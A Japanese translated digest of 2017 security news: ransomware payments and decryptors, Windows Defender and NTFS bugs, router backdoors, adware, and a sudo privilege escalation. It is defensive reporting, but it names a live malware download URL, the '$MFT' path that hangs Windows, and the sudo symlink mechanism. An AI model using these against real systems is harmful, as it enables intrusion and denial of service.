     研究者達は、Pinkslipbotの著者が、彼等が当初思っていたよりずっと悪賢かったと発言している。McAfeeによると、ユーザのデータを盗むことに加えて、このバンキング トロイはまた、網状のネットワークで、中心となるC&Cサーバから他の感染したホストに情報を中継するためのプロキシサーバーとして、感染したホストを使用している。

    新しいMcAfeeのツールは、Pinkslipbot感染の最終的な残存物を削除する

     McAfeeによると、殆どのセキュリティツールは、このマルウェアのメインのバイナリだけを削除する。これで、感染したホストからパスワードを収集するための、このトロイの能力は活動不能になる。
     このようなPinkslipbot削除手段は、それらがプロキシサーバを作成しているコードを放置する。そして、これは、Windows UPnP(Universal Plug and Play)サービスを介して実行される。
     McAfeeの新しいツールは、これら残存ファイルを削除し、ユーザのPCを使用してC&Cコマンドを中継することや、網状になっているプロキシを介して盗まれたデータの流出を隠蔽することを妨げる。
     AmIPinkC2ツールはコチラからダウンロード可能である。McAfeeは、コチラPDF)に使用説明書を公開している。


    韓国の企業が身代金支払いの最高額を更新
    The BBC : News (2017/06/20)
     韓国のウェブホスティング会社Nayanaが、ハッカーによって機能停止にされたコンピュータのロックを解除するために100万ドル(約1億1000万円)の支払いに同意していた。
     これは記録的な金額であると信じられているが、注目されるのは、多くの身代金の支払額は決して公開されてこなかったことである。
     Nayanaの最高経営責任者は、ハッカーが当初、Bitcoinで440万ドル要求していたことを明らかにした。
     セキュリティ専門家は、企業は、そのような支払いをすべきではないし、ハッカーと交渉に入るべきでもなかったと警告している。
     Angela Sasse(The Institute in the Science of Cyber-Securityの重役)は、身代金の多さと、この企業が支払いを公表したことの両方で驚かされたと発言している。
     「これは、私が知る限り身代金の最高額であるが、一部企業は支払うだろうし、公表はしないだろう」
     「これは、韓国の規制構造の下では金額を公開する必要があり、公共心から実行されたということがあり得る」と、彼女は発言している。
     「攻撃者の観点からすると、彼等は、この企業が内密にしていて欲しかったかもしれない。このような多額の身代金は、多くの企業がセキュリティへの注意に拍車をかけるかもしれないからである。」

    支払不能者

     Erebusとして知られるこの身代金要求型マルウェアは、Microsoft Windowsを実行しているコンピュータをターゲットにしているが、変種はLinuxベースのシステムでも動作するように修正されている。
     Nayanaは、身代金を440万ドルから50万ドル未満に値切ろうとして、ハッカーと交渉に入っていたが、最終的に、倍額の100万ドルで合意したようである。
     この企業は、153のLinuxサーバーと、3400の顧客のWebサイト上のデータを暗号化されたと見られている。
     土曜日にアップデートされた投稿では、技術陣はデータ復元のプロセス中にあるが、時間がかかるだろうと追加されている。
     Nayanaの最高経営責任者は、この事件の「衝撃と被害」に関して謝罪した。
     早期のステートメントで、この攻撃は、彼の預金残高を攻撃したと、彼は発言していた。
     「現在、私は支払不能者である。私が20年間働いた全ての物は、明日の12:00に雲散霧消するだろう。」
     Ms Sasseは、身代金要求型マルウェアの攻撃者達は、此処数年大変大胆になってきていると発言している。
     「二年前、彼等は、個人と適切なセキュリティ対策ができていないと思われていた中小企業をターゲットにする傾向があったが、彼等は、より大きなターゲットが、より大きな利益を生むことを発見した。これは、実入りのいいビジネスである。」


    KasperskyがJaff身代金要求型マルウェア用復号プログラムをリリース
    BleepingComputer : News>Security (2017/06/14)
     我々は、Fedor Sinitsyn(Kaspersky Labsの上級分析アナリスト)が、Jaff身代金要求型マルウェアの弱点を発見し、今日までにリリースされた全ての変種に関する復号プログラムをリリースしたことを報告できることを幸いに思う。Jaff身代金要求型マルウェアに感染し、.jaff, .wlu, .sVn の拡張子で暗号化された人々は、この復号プログラムでファイルを無料で復元することができる。
     この復号プログラムを使用している間、あなたが何らかの疑問や、ファイルの復号にサポートを必要とするのであれば、我々の専用のJaff Ransomware Help & Support Topicに遠慮無く投稿しなさい。

    RakhniDecryptorを使用してJaff (SVN, WLU, Jaff)で暗号化されたファイルを復号する方法

     Jaff身代金要求型マルウェアに感染した犠牲者は、彼等の暗号化されたファイルに .jaff, .wlu, .sVn 拡張子の何れかが追加されていることで同定される。例えば、test.jpgと名付けられていたファイルが暗号化されると、test.jpg.jaff, test.jpg.wlu, test.jpg.sVn の何れかにリネームされているだろう。Jaffの .sVn変種によって暗号化されたファイルのフォルダの例を以下に掲げる。


    Jaffで暗号化されたファイル(画像をクリックすると拡大します)

     Jaffで暗号化されたファイルを復号する前に、この身代金要求型マルウェアを終了させる必要がある。これを実行するには、Windowsセキュリティ画面を開くために[Ctrl]+[Alt]+[Delete]キーコンビネーションを実行することによって、Windowsタスクマネージャを選択し、開く。
     タスクマネージャが開いたら、ランダムな名前で表示されているプロセスを探す。例えば、.sVnの或るキャンペーンは、SKM_C224e9930.exeのような名前を使用していた。実行されているJaffプロセスを決定したら、そのプロセスを選択した状態で、プロセスの終了ボタンをクリックし、それを終了させなさい。あなたが実行されているプロセスを特定できないのであれば、あなたのタスクマネージャの画像、もしくは実行されているプロセスのリストを、遠慮無く投稿しなさい。我々は、どのプロセスを終了させればいいかを、あなたに教えることができる。また、Jaffプロセスが実行されていない可能性もある。


    タスクマネージャ

     これで、Jaffはコンピュータ上で実行されていないので、我々は、暗号化されたファイルの復号を始めることができる。まず、RakhniDecryptorをダウンロードし、このプログラムを解凍する。次に、それを実行する。この復号プログラムが起動すると、以下に示すメイン・スクリーンが表示される。


    RakhniDecryptor

     始める前に、あなたが、バージョン 1.21.2.1(このバージョンがJaff身代金要求型マルウェアをサポートしている)を使用していることを確認する必要がある。RakhniDecryptorのバージョンをチェックするには、上図の左下隅にあるAboutをクリックしなさい。これで、RakhniDecryptorのバージョンを示す小さなウィンドウが表示される。


    About画面

     バージョン 1.21.2.1 もしくは、それ以降を使用しているのであれば、Start Scanボタンをクリックしなさい。RakhniDecryptorは、あなたに暗号化されたファイルを選択するように促してくる。Jaffで暗号化されたファイルを含むフォルダに移動し、.Word, Excel, PDF, ミュージック, 画像 ファイルの何れかを選択しなさい。


    Jaffで暗号化されたファイルを選択する(画像をクリックすると拡大します)

     暗号化されたファイルを選択すると、RakhniDecryptorは、同様に脅迫文を選択するよう要請してくる。


    Jaffの脅迫文を選択する(画像をクリックすると拡大します)

     脅迫文を選択したら、Openボタンをクリックする。RakhniDecryptorは、これで暗号化されたファイルに関してコンピュータ全体をスキャンし、それらを復号するだろう。


    Jaffで暗号化されたファイルをスキャン中

     このプロセスは大変長い時間がかかるので、この復号プログラムがコンピュータをスキャンし、暗号化されたファイルを復号する間、辛抱しなさい。
     このプロセスが終了すると、以下に示す完了画面が表示される。


    復号完了

     この復号プログラムによって復号されたJaffファイルの完全なリストを見るには、detailsのリンク(【訳注】 上の画像中のScan Completedの2行下、Processed: の右端)をクリックしなさい。


    スキャン結果のページ(画像をクリックすると拡大します)

     あなたのファイルは現在復号されているけれども、暗号化されたオリジナルのファイルは残されたままであることに留意する必要がある。


    復号されたフォルダのファイル(画像をクリックすると拡大します)

     あなたのファイルは、これで復号されたが、暗号化されたオリジナルのファイルはコンピュータ上に残ったままになっている。ファイルが適切に復号されたことを確認したら、暗号化されている全てのファイルを或る特定のフォルダに移動させるためにCryptoSearchを使用しなさい。これで、暗号化されているオリジナルのファイルを削除したり、アーカイブしたりすることができる。

     これで、ファイルは復号されたので、RahkniDecryptorを終了しなさい。


    研究者が、Windows Defenderエンジンの修正は不完全と発言
    The Register : Security (2017/06/15)
     立て続けのWindows Defenderを修正するためのパッチにも拘わらず、少なくとも一人のセキュリティ研究者が、未だ実行されなければならなない仕事が存在していると認識している。
     Zer0conのようなカンファレンスでプレゼンしてきたJames Leeは、The Registerに接触し、脆弱性の中核であるコンポーネントMsMpEngが、依然としてリモートコード実行を被る可能性があると発言している。
    Tavis Ormandyと、それに続いたProject Zeroの研究者Mateusz Jurczykによって公開されたバグ同様に、Leeが我々に概要したバグは、不十分なSandbox化のために生じている。
     彼は我々に対して完全な詳細を提供していないが、彼は、Youtubeにリモートコード実行の概念の証明(proof-of-concept)ビデオを投稿している。

    Youtubeのビデオ 1 Youtube ビデオ

    Youtubeのビデオ 2 Youtube ビデオ

     最初のビデオで見られたように、システムを完全にパッチしているにも拘わらず、Leeの作業はWindows Defenderをクラッシュし、再起動が不可能なことを示している。
     Leeは、彼の発見が、Project Zeroの最近の公開に対するMicrosoftの修正に関連していないと、The Registerに告げている。これらは(彼がeMailで記述している)、彼が、Type Confusion(データの型の処理での問題の発生)と論理的なバグを掘り下げている間に、「複数のDoS、整数オーバーフロー、use-after-free(解放済みメモリの使用)バグ」に広がった。
     MsMpEngがサンドボックス化されている必要があるとするLeeのデモンストレーションは、Ormandyの別のTweetにも一致している。
     5月始めから、MsMpEngの不十分なサンドボックス化は、研究者から批判の増大を招いていた。昨日、さらにもう一つのサンドボックス・エスケープが、Thomas VanhoutteによってGitHubに投稿された。この脆弱性(未だ確定していないと、Vanhoutteは記述している)は、ゲスト権限の攻撃者にDefenderを使用する能力を与え、Dllを含む任意のファイルを削除できるようにするものである(これは、様々なハイジャックの機会を提供することになるだろう)。


    一部の古いWiMAXルータは、OEMバックドアを含んでいる
    BleepingComputer : News>Security (2017/06/07)
     WiMAXテクノロジを基礎とする一部の古いルータは、そのデバイスの供給プロセスの何処かで導入されたと思われるバックドア アカウントを含んでいる。
     これらのバックドア アカウントは、SEC Consultのセキュリティ研究者達が、インターネット上にWebベースの管理コンソールを露出させていた数万のWiMAXルータを発見した2016年09月に明るみに出た。
     幾つかのデバイスのファームウェアを検査した後、研究者達は深刻な脆弱性と、幾つかのバックドア アカウントも発見した。

    攻撃者は管理アカウントのパスワードを変更することができる

     彼等が発見した脆弱性は、CVE-2017-3216であり、これは、Webベース管理パネルの認証をバイパスするものである。研究者達によると、攻撃者は、これらのルータと共に出荷された組み込みのWebサーバ上のファイルにアクセスすることができ、メインの管理アカウントのパスワードを変更することができる。
     「攻撃者は、デバイスへのアクセスを取得でき、その背後にあるネットワークにアクセスでき、そして、に更なる攻撃(Miraiのようなボットネット中にデバイスを追加したり、あるいは、単にユーザをスパイする)を起動することができる」と、SEC Consultチームは発言している。これによって影響を受けるルータは以下である。

      GreenPacket OX350 (Version: ?)
      GreenPacket OX-350 (Version: ?)
      Huawei BM2022 (Version: v2.10.14)
      Huawei HES-309M (Version: ?)
      Huawei HES-319M (Version: ?)
      Huawei HES-319M2W (Version: ?)
      Huawei HES-339M (Version: ?)
      MADA Soho Wireless Router (Version: v2.10.13)
      ZTE OX-330P (Version: ?)
      ZyXEL MAX218M (Version: 2.00(UXG.0)D0)
      ZyXEL MAX218M1W (Version: 2.00(UXE.3)D0)
      ZyXEL MAX218MW (Version: 2.00(UXD.2)D0)
      ZyXEL MAX308M (Version: 2.00(UUA.3)D0)
      ZyXEL MAX318M (Version: ?)
      ZyXEL MAX338M (Version: ?)

     * 他のルータも影響を受ける可能性が高い。

    不可解なOEMバックドアのケース

     SEC Consultの研究者達は、彼等がオペレーションを検査している間、彼等が使用したツールは、一部のルータのファームウェア中にハードコードされていた大量のUNIXスタイルのパスワード ハッシュを見つけ出した。これらのタイプのハッシュは、デバイスにバックドア アカウントが付属している場合にだけ現れる。


     コードを詳細に調べた後、彼等は、認証バイパス脆弱性とバックドア アカウントの両方が、台湾のハードウェア企業MediaTek(【訳注】 メディアテック)によって開発されたSDKを介して導入されていたことを明確にした。
    CERT/CCの職員と共に研究者達はMediaTekに接触したとき、この会社は、これらの問題が発見されたファイルは、彼等のオリジナルのSDKパッケージの一部ではないと発言した。
     SEC Consultによると、この脆弱性とバックドアアカウントの両方に関し、MediaTekはファームウェアに何らかの追加を行った可能性のある源泉としてZyXEL(【訳注】 ザイセル、台湾新竹市にあるネットワーク機器製造業者(Wikipediaより))を非難した。
     SEC Consultの更なる捜索は、他の影響を受けるベンダ(GreenPacket, Huawei, ZTE)を明らかにした。これらの企業全てが、ZyXELの姉妹会社であるMitraStar(盟創科技)からホワイトラベルのルータを購入していた。この発見は、ZyXELの開発者達がSDKを変更し、彼等の同僚とそれを共有したというMediaTekの理屈を肯定するものであった。
     誰がMediaTekのSDKを改竄していようと、このデバイスは、バックドアがその仕事をするために異なるISPに拡散することは考え難い。

    数万のルータがオンラインで利用可能になっている

     影響を受ける殆どのルータは、かなり昔(2010年頃に製造された)のものである。Huawei(ファーウェイ)は、影響を受けるモデルの全てに関して2014年頃にサポートを停止したと発言している。
     これにも拘わらず、研究者は、インターネット ワイドなスキャンは、管理インターフェースをオンラインに晒されている脆弱性のあるWiMAXベースのルータを5万から10万の間で検出したと発言している
     この大きな数は、多くの脆弱性のあるルータが、Defaultの設定のままなので、WebパネルをWANインターフェースに晒している事実によって正当化される。
     あなたのISPが、そのインターフェースへのアクセスを特にブロックしている場合を除き、あなたが現在影響を受けるルータの何れかを使用しているのなら、ボットネット操作者の誰かが、立ち所にあなたのデバイスを乗っ取る可能性は高いだろう。あなたのWiMAXルータが、WANポートを介した管理インターフェースへのアクセスをブロックすることを可能にしているのであれば、その機能を有効にすることは適切な考えである。
     全体的に見て、WiMAXが、そのうちLTE Advancedによって置き換えられる古いテクノロジであるということを考慮に入れたならば、脆弱性のある製造物の数は、非常に多いと言える。

    WannaCry後、Fireballマルウェアが2億5000万のコンピュータに感染している。インドが最悪の影響を受けた
    Fossbytes : News (2017/06/07)
     概要: Fireballは、WindowsとmacOSデバイスをターゲットにして広まっている新しく悪名高いマルウェアである。中国のマーケティング企業Rafotechによって開発されたFireballは、ユーザのWebブラウザを制御し、インチキの広告クリックを生成する。これはまた、Webブラウザにあらゆる変更を実行し、より有害なマルウェアをインストールする能力を特徴としている。ユーザは、ブラウザに疑わしい要素やアドオンを探すようにアドバイスされている。

     WannaCry身代金要求型マルウェアが世界中の数十万のコンピュータを撃滅した後、我々はFireballと名付けられた別の危険なマルウェア キャンペーンが台頭していることを目撃している。セキュリティ企業
    Check PointのThreat Intelligenceは、大量の脅威(世界中の2億5000万を超えるコンピュータに感染)を発見した。
     中国を発生源とするこのマルウェアは、二つの主な能力を持っている。このマルウェアは、犠牲者のコンピューター上で、あらゆる悪意あるコードを実行できる。このマルウェアはまた、不正な広告収入を生み出すために、感染したユーザのトラフィックをハイジャックし、巧みに取り扱うこともできる。最も感染させられている国は、インド(10.1%)、ブラジル(9.6%)である。
     全体としてFireballマルウェア オペレーションはRafoteck(北京を本拠とする大手マーケティング代理店)によって実行されているということを知ると、あなたは驚かされるだろう。この会社は、WebブラウザのホームページやDefault検索エンジンをインチキのものに変更するためにFireballマルウェアを使用している。
     Check Pointは、Fireballのようなハイブリッド作成物(半分外見的にはまともなソフトウェア、半分マルウェア)をブラウザハイジャッカーと呼んでいる。現在Rafotechは、インチキのインターネット トラフィックを生成するためにFireballを使用しているが、マルウェアの一般的なあらゆるアクションを実行できることに留意しなさい。

     これは、Fireballが、ユーザを悪意あるWebサイトに振り向けたり、マルウェアの投下を実施したり、犠牲者をスパイしたりする先進的な能力を持っていることを意味している。Fireballの設計は先進的であり、回避テクニックとマルチレイヤー アンチ検出テクニックを含んでいる。更に、Fireballはまた、フレキシブルなC&Cサーバを持っている。
     しかし、Fireballは、どのように拡散したのだろうか? Fireballに関して、Rafotechは、なんとかバンドリング(同梱)と呼ばれるアドウェア配布ルートを利用している。Rafotechは、望まれたプログラムに不要なプログラムとしてFireballを同梱する拡散方法を使用している。

    Fireballに感染しているか否か確認するには?

     あなたがFireballに感染しているか否かチェックできるように、Check Pointは、幾つかの簡単なポイントを提示している。以下に尋ねられている質問の答えが No であれば、あなたはアドウェアに感染している可能性がある。

     最初に、Webブラウザを開きなさい。
     Webブラウザのホームページと検索エンジンに注目しなさい。それは、あなたが設定したものか?
     あなたは、ホームページや検索エンジンを変更することができるか?
     あなたは、Webブラウザにインストールしている拡張を認識しているか?

     殆どのアドウェアを削除するには、コンピュータから単純にそのアプリケーションを削除するだけである。Windowsでは、Windowsのコントロールパネルから、プログラムの追加と削除 / プログラムと機能 で実行することができる。Macでは、Finderで、そのアプリケーションを探しだし、その疑わしいプログラムをTrashにドラッグする。
     あなたはまた、適切なアンチマルウェアとソフトウェア クリーナーを使用してコンピュータをスキャンしクリーンにすることもアドバイスされている。また、Webブラウザの 拡張/アドオン リストを検索し、疑わしい物を削除することもできる。
     Fireballマルウェアに関する詳細に関しては、コチラを参照しなさい。


    リンクにマウスをホバー(かざした)時、PowerPointファイルは、マクロを要求することなくマルウェアをダウンロードする
    BleepingComputer : News>Security (2017/06/02)
     セキュリティ研究者は、犠牲者がリンクにマウスホバー(マウスをかざす)した時、コンピュータにマルウェアをダウンロードするブービートラップされたPowerPointファイルに注目している。これは、マクロ スクリプトを要求しない。
     このファイルは、eMail添付ファイルとして犠牲者になる可能性のあるものに対して配布されているPowerPointプレゼンテーション ファイルであり、件名は、"RE:Purchase orders #69812" もしくは、 "Fwd:Confirmation"である。このPowerPointファイル自体の名前は、"order&prsn.ppsx", "order.ppsx", "invoice.ppsx"であり、ZIPファイル内部に拡散していた証拠も存在している。


    ブービートラップされたPPSXファイルを配布しているスパム メール(画像をクリックすると拡大します)

     前略
     5月31日(水)にロンドンからサリーへの器材の移動に関する注文書をご確認ください。
     草々

    Nasim Khan , E-Pharm Limited
    Phone : +44 (0) 203 3002245

    これらPPSXファイルは、開いた時に、PowerPoint編集モードの代わりに、PowerPointの発表者ビューになることを除いて、PPTXファイルと全く等しい。
     このPowerPointファイルは、ハイパーリンクに変換されたテキスト"Loading...Please wait"を含む以下の内容(下の画像)の一枚のスライドだけを含んでいる。


    PPSXファイルのコンテンツ

     ユーザがこのURLにマウスをホバーすると必ず、悪意あるコードが実行され、PowerShellが起動され、以下のコードを実行しようとする。


    悪意あるコード[難読化されている](画像をクリックすると拡大します)


    悪意あるコード[難読化解除](画像をクリックすると拡大します)

     ユーザがOfficeインストレーションを、保護ビュー セキュリティ機能を有効にして使用していたなら、Officeは、攻撃の実行を停止するだろう。


    Officeの保護ビューが、悪意あるコードの実行を停止

     保護ビューを無効にしているユーザや、ユーザがポップアップを無視しコードの実行を許可した時には、悪意あるPowerShellコードが、http://cccn.nl/c.php に接続を企て、別のファイルをダウンロードするだろう。
     我々のテストの間、この悪意あるPPSXファイルは、平凡なマルウェア ローダーをダウンロードした。これは、ユーザのローカルTempフォルダに保存され、後で、cmd.exe を介して実行ファイルを起動しようとする。

    Office保護ビューは、「リンク ホバー」テクニックから保護する

     Bleeping Computerのコンタクトに対して、Microsoftのスポークスマンは、この攻撃ベクトルに関する詳細な情報を提供した。

    Officeの保護ビューは、Defaultで有効になっている。そして、このレポート中で説明されているテクニックに対して防御する。Windows DefenderとOffice 365のAdvanced Threat Protectionも、このマルウェアを検出し削除する。我々は、ユーザが適切なコンピューター習慣をオンラインで実践するよう促しており、コンテンツを有効にしたり、Webページヘのリンクをクリックしたりした時、注意するようにしている。

     Microsoftが、彼等のステートメントで発言しているように、Office ProtectedがDefaultで有効になっているので、Officeは、このテクニックに対して防御する。この機能をOFFにしていることを認識しているユーザや組織は、この攻撃ベクトルを考慮に入れるように、彼等のポリシーを検証する必要がある。

    IOCs

    PowerPointファイル:
    796a386b43f12b99568f55166e339fcf43a4792d292bdd05dafa97ee32518921
    f05af917f6cbd7294bd312a6aad70d071426ce5c24cf21e6898341d9f85013c0

    第二ステージ EXE:
    9efc3aa23de09f1713a2e138760a42d0a14568c86cdbb5499d2adddbe197db57


    WannaCryに開発エラー、ファイル復元の可能性
    Kaspersky : ThreatPost (2017/06/01)
     WannaCryは、5月12日に、NSA(米国国家安全保障局)が武器化したEternalBlueエクスプロイトを利用して150カ国のコンピュータを感染させ、世界中に大損害を発生させたが、これは、身代金要求型マルウェアの高級品であったことを意味してはいない。
     このコード中の幾つかのプログラミングエラーが表面化し、研究者達は、復号キー無しにファイルを復元することがシステム管理者にとって実現可能になっていると発言している。
     Kaspersky Labは、このマルウェアによって暗号化されたファイルを復元するために活用できるWannaCry中の幾つかの問題を公開した。今迄、20万コンピュータがWannaCryによって攻撃され、その拡散は、そのコード中にキルスイッチが発見された後シャットダウンされた。これは、このコードの作者が一流でない可能性があるという最初のヒントであった。
     「経験ある身代金要求型マルウェアの作者は、このような失敗はしない」と、「我々の立場からすると、我々は、WannaCryの開発者は、全く開発の経験が無いように思われる」と、Anton Ivanov(Kaspersky Labの上級マルウェア アナリスト)は発言している。
     Ivanovは、同僚のFedor Sinistyn, Orkhan Mamedovと共に、本日Securelist.com上にWannaCryの開発者が作成した二つの重大なエラーを説明するレポートを公開した。この二つのエラーは、管理組織が、失ってしまいそうなファイルを復元するために入手可能な復元ソフトウェアを使用することを可能にするものである。
     「我々の内部テストは、多くのファイルを取り戻すために、かなりの確率があることを示している」と、「システム管理者は、フリーウェアをダウンロードし、影響を受けたコンピュータ上で実行することができる。ファイルの復元に特別な経験を必要としない」と、Inavovは発言している。
     このマルウェア中の一つの弱点は、犠牲者のハードドライブからファイルを削除するためのプログラミング ロジック中のエラーに関連している。WannaCryは、ローカル ハードドライブ上のファイルを暗号化するとき、オリジナルファイルに .WNCRYT 拡張子を追加する。これらのファイルは、暗号化され .WNCRYT 拡張子が加えられ、オリジナルファイルは削除される。ファイルが、犠牲者のデスクトップやドキュメント フォルダにもともと存在していたのであれば、そのオリジナル ファイルは削除される前にデータで上書きされるので、復元は不可能であると、この研究者達は発言している。

     しかしながら、ファイルがローカルドライブ上の他の場所に保存されていた場合は、それらのファイルは上書きされずに、削除されるだけなので、復元ソフトで復元できる可能性があると、この研究者達は発言している。
     この研究者達はまた、この身代金要求型マルウェアが、Windows File Explorerで不可視に設定されている$RECYCLEフォルダを作成している(これはオリジナルファイルが暗号化された後、此処に移動させられることが意図されている)と、発言している。
    「しかしながら、多くの場合、この身代金要求型マルウェア コード中の同期エラーのために、オリジナルのファイルは同じディレクトリ中に存在しており、$RECYCLEには移動されていない」と、「オリジナルのファイルは安全ではない方法で削除されている。この事実は、データ復元ソフトを使用して削除されたファイルを復元することを可能にしている」と、彼等は記述している。
     WannaCryの読み込み専用(Read Only)ファイルの処理はまた、ファイルの復元を容易にするバグを、その中に持っている。
     「そのようなファイルが、感染したマシン上に存在している場合、この身代金要求型マルウェアは、絶対にそれら読み込み専用ファイルを暗号化しない」と、「夫々のオリジナルファイルの暗号化されたコピーを作成するだけであり、オリジナルファイル自体は、これが発生した時、’hidden’(隠し)属性を付加されるだけなので、このようなファイルを発見し通常の属性に戻すだけで復元できる」と、この研究者達は発言している。

     研究者達は、WannaCryによって暗号化されたファイルの復号プログラムの構築に取り組んでいた。QuarksLabのAdrien Guinetは、このマルウェアによってローカルに格納されたRSA公開鍵を因数に分解するのに用いられるメモリから素数を復元できるWannaKeyと呼ばれるツールを構築しリリースした。この公開鍵は、暗号化されたファイルに使用された秘密鍵を再構築するために使用することができると、Guinetは発言している。彼は更に、Benjamin Delpyによって構築されたWanaDecryptと呼ばれるツールを使用することで成功したと付け加えている。Delpyの発言によると、彼はまた、Windows XPとWindows 7で動作するWanakiwiと呼ばれる別の復号プログラムを構築している。
     しかしながら、Ivanovは、これらのツールを使用したテストでは、ファイルの復号に成功しなかったと発言している。
     「彼等(【訳注】 WannaCryの開発者)がWannaCryで上手く実行した唯一のことは、このマルウェアの暗号文部分である」と、「しかし、これはロケット科学ではないので、この暗号化スキームは、他の人気のある身代金要求型マルウェア ファミリーに使用される」と、Ivanovは発言している。


    Linuxのsudoコマンドの脆弱性に対するパッチが利用可能になった
    Kaspersky : ThreatPost (2017/05/31)
     Red Hat, Debian, その他のディストリビューションは昨日、深刻度「高」のsudoの脆弱性に関するパッチをリリースした。この脆弱性は、ルート権限を取得するためにローカル攻撃者(【訳注】 ローカル攻撃: 攻撃者が物理的なアクセスや正当なリモートアクセスによって接続しているコンピュータまたはネットワークに対して行われる攻撃。これには、攻撃者が実際に使用しているコンピュータや、そのコンピュータが接続されているネットワークが含まれることもある(Symantec用語集より))によって悪用される可能性があった。
     sudoは、LinuxやUNIXシステム用のコマンドであり、標準ユーザがスーパーユーザーとして、ユーザの追加や、システムアップデートの実行のような特定のコマンドを実行することを可能にするものである。
     今回の場合、Qualysの研究者は、sudoのget_process_ttyname関数中に脆弱性を発見した。これは、sudo権限を有するローカル攻撃者が、ルートとして、もしくはルートに権限を昇格してコマンドを実行することを可能にするものである。
     sudoプロジェクトWebサイト上の警告は、システムでSELinux(【訳注】 アメリカ国家安全保障局 (NSA) がGPL下で提供しているLinuxのカーネルに強制アクセス制御 (MAC) 機能を付加するモジュールの名称であり、Linuxのディストリビューションではない(Wikipediaより))が有効になっており、sudoがSELinuxサポートと共に構築された場合に、この脆弱性が引き金となると発言している。sudo 1.8.6p7 から 1.8.20 が影響を受ける。ユーザは、sudo 1.8.20p1 にアップデートしなければならない。
     「Linuxシステムでは、sudoは、プロセスのtty(field 7)のデバイス番号を決定するために /proc/[pid]/stat ファイルを解析する。ファイル中のこのフィールドは、スペースで区切られているが、これは、コマンド名(field 2)に空白(改行を含む)が含まれることを可能にしている。そして、sudoは、これに関して釈明していない。sudo権限を持つユーザーは、sudoバイナリから空白(その後に数字が続く)を含む名前に対してシンボリックリンクを作成することによって、そのユーザが選択しているデバイス番号を使用するためにsudoを呼び出すことができる」と、sudoアドバイザリは発言している。
     Qualysは、この記事へのコメントを辞退している。
     「脆弱性攻撃された場合、この問題は、攻撃者が制御を回避し、想定されている以上のことを実行することを可能にする」と、「攻撃者は前もってサーバー上に存在する必要があり、この脆弱性を使用するにはsudoを介してコマンドへのアクセスを許可されている必要がある」と、Red HatセキュリティチームはThreatpostに告げた。
     Debianのwheezy, jessie, sidやSUSE Linuxの幾つかの製品を含む他のディストリビューションが修正をリリースしたのと同様に、Red Hatは、Red Hat Enterprise Linux 6, Red Hat Enterprise Linux Server, Red Hat Enterprise Linux 7用の修正を昨日リリースしたと発言している。
     Qualysは、システムがパッチされた時点で、そのエクスプロイトを公開するだろうと発言している。
     「SELinuxを有効にしているシステムでは、ユーザが、彼に完全なルート権限を許可しないコマンドに関してSudoer(【訳注】 正確にパスワードを指定することなく他のユーザのセキュリティ権限でプログラムを実行することを許可されているユーザ(Wiktionary英語版の和訳))であるなら、彼は、ファイルシステム上のあらゆるファイル(ルートが所有しているファイルを含む)を、彼のコマンドの出力で上書きすることができる。これは、relabel_tty()(src/selinux.c内)が、彼のttyに関してopen(O_RDWR|O_NONBLOCK)をコールし、そのコマンドのstdin, stdout, stderrにそれをdup2()するからである」と「これはまた、あらゆるSudoerユーザが完全なルート権限を取得することを可能にしている」と、Qualysの研究者は、OSS-Securityメーリングリスト上に公開したアドバイザリで記述している。

    SIOSセキュリティ ブログより引用

    主なディストリビューションの対応方法

    詳細は、各ディストリビューションの提供元にご確認ください
    Debian
    https://security-tracker.debian.org/tracker/CVE-2017-1000367

    Red Hat Enterprise Linux/CentOS
    https://access.redhat.com/security/cve/CVE-2017-1000367

    ubuntu
    https://people.canonical.com/~ubuntu-security/cve/2017/CVE-2017-1000367.html

    SUSE/openSUSE
    https://www.suse.com/security/cve/CVE-2017-1000367.html


    Microsoftが、先週Malware Protection Engineの沢山のバグをパッチしていた
    The Register : Security (2017/05/29)
     Microsoftは、Google Project Zeroからコッソリ通知されていたMalware Protection Engineの沢山のバグをパッチするための定例外のアップデートをリリースしていた。
     Project ZeroのMateusz Jurczykは、「とんでもなく酷い」バグを公開しなかった。この新しいバグは全て「Microsoft Malware Protection EngineのDoS(Denial of Service)脆弱性」もしくは、「Microsoft Malware Protection Engineリモートコード実行脆弱性」と名付けられているが、Microsoftの発表では8つの個別のバグが記述されている。
     これらは全て、同種の脆弱性に関する異なる観点のものである。このMalware Protection Engineに細工されたファイルをスキャンさせると、あなたは、Malware Protection Engineを殺すか、メモリ損壊を介してMalware Protection Engineをクラッシュさせることができる。
     個別のバグは、CVE-2017-8535, CVE-2017-8536, CVE-2017-8537, CVE-2017-8538, CVE-2017-8539, CVE-2017-8540, CVE-2017-8541, CVE-2017-8542である。
     このバグは、コチラのProject Zeroで説明されている。
     Jurczykは、NULLポインター逆参照、0による除算、無限再帰のバグは、DoSのリスクをもたらすだけであるが、リモートコード実行のバグはメモリ損壊のバグに基づいていると言及している。
     Microsoft Malware Protection Engineの企業ユーザは、この修正が自動的に適用されるので、何も実行する必要はない。Microsoftは、このアナウンスを実行する前にパッチを発行している。


    Microsoftのマスター ファイル テーブルのバグは、Windows 7、8.1をBSODにする脆弱性が存在している
    The Register : Security (2017/05/29)
     Microsoftが、この問題をパッチするまで、Chromeを使用しなさい。ファイルパス処理の手落ちは、攻撃者がファイルをコールして、Windows 7、8.1をクラッシュさせることが可能になっている。
     このバグは、Windowsのマスター ファイル テーブルがディレクトリ パス中に含まれているか否かが引き金になっていた。例えば、攻撃者が、Webサイト中のイメージへのリンクとして$MFT(マスター ファイル テーブル)を含んでいたような場合である。
     ロシアのAlladin Information SecurityのAnatolymikは、コチラ(ロシア語)に発見に関して主張している。
     $MFTは、ユーザーアクセスから保護されるようにサポートされている。その適切な理由は、NTFSボリューム上の全てのファイルは、MFTを参照していることにある。
     この研究者が発見したことは、あなたが、c:\$MFT\foo のようなファイルにアクセスしようとした場合、NTFS(NTファイルシステム)は、$MFTをロックし、それを解放しないということであった。「それは、ずっとキャプチャされたままだろう」、「それ故、例えば、ファイルを作成しようとした時や、ファイルのボリュームを読み込もうとした時に、NTFSは、ERESOURCE $ MFTファイルを専有しようとするので、永久にこの段階でハングするだろう」と、このポストは述べている。
     Bleeping Computerは、Chromeユーザは、Chromeが悪意あるパスの付随するイメージを認識しブロックするので、遠隔から攻撃されることはない。しかしながら、Internet ExplorerとFirefoxは共に脆弱性があると、忠告している

    Wallet身代金要求型マルウェアのマスターキーがBleeping Computerにリリースされた。Avastが無料の復号ツールをリリース
    BleepingComputer : News>Security (2017/05/18)
